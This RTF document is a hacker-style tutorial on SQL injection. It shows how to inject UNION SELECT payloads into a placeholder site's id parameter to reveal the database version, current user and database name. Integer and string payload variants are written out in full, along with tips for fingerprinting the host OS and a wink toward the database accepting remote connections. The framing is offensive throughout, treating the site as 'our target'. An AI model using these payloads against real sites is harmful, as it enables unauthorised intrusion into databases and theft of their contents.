{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fnil\fcharset0 Calibri;\f1\fnil\fcharset0 LucidaGrande;\f2\froman\fcharset0 TimesNewRomanPSMT;
}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red190\green0\blue4;}
\paperw11900\paperh16840\margl1440\margr1440\vieww17280\viewh10460\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\b\fs28 \cf1 \cb2 \expnd0\expndtw0\kerning0
\ul \ulc1 UNION SELECT TO FIND VERSION, CURRENT DATABASE, CURRENT USER:\

\b0 \ulnone \
\pard\pardeftab720\partightenfactor0

\b \cf1 Site:
\b0  {\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=725"}}{\fldrslt \cf3 http://www.site.com/index.php?id=725}}\

\b Column Count:
\b0  5\

\b Vulnerable Columns:
\b0  2,4,5\
\
OK, so we found some information about our target to indicate it is vulnerable to SQLi so lets now check to see how vulnerable it really is and what all we can find. We will first check the Database version to determine which method we will use to extract information in next steps, as the methods used will differ based on version (>=5 OR <5). In order to do this we will use our UNION SELECT statement to find out the version info first, like so:\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\b INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@version,3,4,5--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,@@version,3,4,5--+-\
\

\b NOTE
\b0 : if you don\'92t get positive results with the above you can swap "@@version" for "version()". Depending on the system configuration it may prefer the @@ or the () calls, so make sure to test both if you\'92re not having any luck.\
\
You should get some type of result displayed where it previously showed the number 2, since in this case we have replaced the column2 with our request for version(). You should see something along the lines of one of these which will indicate the version number:\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 4.1-log\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 4.3\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 5.1.52\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 5.0.75-0ubuntu10\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 5.0.77\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 5.0.91-log\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 5.0.92-community-log\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 NOTE
\b0 : you can make assumptions about the host OS based on some of the trailing tags to the version. i.e. "-log" and "community-log" tend to indicate a Windows based host OS, while things like "0ubuntu10" tend to indicate a Linux Ubuntu based OS.\
\
\
\pard\pardeftab720\partightenfactor0
\cf1 OK, now we know the version number...let\'92s also check to see what the current database is and who the current user is. We will accomplish this by adding in the request statements for user and current database, like so:\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,version(),3,user(),database()--\

\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,version(),3,user(),database()--+-\
\
We should now see the numbers that were indicating our vulnerable columns now change to display the requested data, which in this case was version, user, and current database. You results should look something like this:\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 version=5.0.92-community-log\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 user=username@localhost OR username@% OR username@there.actual.ip.address\

\b NOTE
\b0 : If you see the "@%" of "@there.actual.ip.address" then this is a strong indication that the actual database server will allow remote connections to be established(hint hint, wink wink), while "@localhost" typically indicates you can only make connections to the DB from the host machine itself\
current database=whatever they have happened to name the current database (this refers to the one that is actually being used to serve the web content for the active page you are using to inject on, as there may be many other databases actually available).\
}